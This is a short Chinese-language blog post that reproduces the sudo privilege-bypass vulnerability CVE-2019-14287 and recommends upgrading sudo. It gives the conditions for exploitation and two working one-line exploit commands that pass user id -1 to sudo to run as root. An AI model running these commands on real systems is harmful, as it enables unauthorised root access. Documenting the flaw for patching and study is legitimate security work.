sudo權限繞過漏洞復現(CVE-2019-14287)

原創 安徽锋刃科技 2020-07-05 20:36

前言

sudo 是所有 unix操作系統(BSD, MacOS, GNU/Linux) 基本集成的一個用戶權限控制/切換程序。允許管理員控制服務器下用戶能夠切換的用戶權限

CVE-2019-14287 是管理員在配置文件中用了 ALL 關鍵詞後造成的。

影響版本

sudo < 1.8.28

利用條件

1、sudo -v < 1.8.28

2、知道當前用戶的密碼

3、當前用戶存在於sudo權限列表

我們來看一下/etc/sudoers

漏洞復現

    sudo -u#-1 id -u

or

sudo -u#4294967295 id -u

修復建議

升級sudo到最新版

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章